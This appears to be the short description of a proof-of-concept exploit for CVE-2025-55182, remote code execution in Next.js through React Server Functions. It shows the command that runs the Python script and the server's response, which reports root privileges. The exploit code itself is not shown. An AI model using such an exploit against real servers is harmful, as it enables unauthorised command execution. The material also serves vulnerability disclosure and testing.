
Proof-of-concept exploit for CVE-2025-55182 enabling remote code execution in Next.js via React Server Functions. Includes a Python script that demonstrates command injection and returns system-level output.
Next.js RCE via React Server Functions
❯ python3 cve-2025-55182-exploit.py
0:{"a":"$@1","f":"","b":"3OmR5Ifk9dmFJ1coB7-Wc"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}